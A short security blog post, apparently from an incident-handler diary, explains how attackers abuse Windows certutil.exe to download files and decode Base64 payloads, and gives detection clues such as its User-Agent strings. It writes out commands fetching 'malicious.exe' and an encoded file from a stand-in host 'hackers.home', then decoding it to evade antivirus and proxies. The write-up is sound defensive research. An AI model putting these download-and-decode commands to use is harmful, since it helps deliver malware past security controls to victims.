A Suspicious Use of certutil.exe
Last Updated: 2018-04-04 05:43:46 UTC
by Xavier Mertens (Version: 1)
The Microsoft operating system is full of command line tools that help to perform administrative tasks. Some can be easily installed, like the SysInternal suite and psexec.exe, others are builtin in Windows and available to everybody. The presence of calls to such tools can help to detect suspicious behaviours. Why reinvent the wheel, if a tool can achieve what you need? I recently upgraded my hunting rules on VirusTotal to collect samples that are (ab)using the "certutil.exe" tool. The purpose of this tool is to dump and display certification authority (CA) information, manage certificates and keys. This is a command line tool that accepts a lot of parameters . A classic use of certutil.exe is to easily process Base64 encoded data:
C:\Temp> certutil.exe -decode input.txt output.exe
But, it is possible to use the tool to perform an important task for attackers: To fetch data from the Internet! Indeed, many Microsoft tools are able to fetch an online file using a URL schema (ftp://, http://, etc). I presume you already know that, in every dialogue box used to open/save a file, you can provide a URL:
It is exactly the same with certutil.exe which can fetch data from the Internet. I spotted a script which uses it in this way. Here is an example of download:
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/malicious.exe" bad.exe **** Online **** 000000 ... 1056d0 CertUtil: -URLCache command completed successfully.
Interesting, the tool makes two connections to the remote web server using two different User-Agents. Here is an extract from the web server logs:
10.x.x.x - - [03/Apr/2018:21:21:11 +0200] "GET /malicious.exe HTTP/1.1" 200 1077596 "-" "Microsoft-CryptoAPI/10.0" 10.x.x.x - - [03/Apr/2018:21:21:15 +0200] "GET /malicious.exe HTTP/1.1" 200 1077540 "-" "CertUtil URL Agent”
What about the command line options?
- "-urlcache" is used to perform URL cache management action.
- "-f" is used to force fetching the specified URL and updating the cache.
- "-split" is used to dump the file on disk.
Let's combine the two features: grab a Base64 encoded text file to bypass AV & proxies and decode it to easily drop a malicious exec on your target:
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt C:\Temp>certutil.exe -decode bad.txt bad.exe
So, no need to install a curl or wget, certutil.exe is available for this basic feature!
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant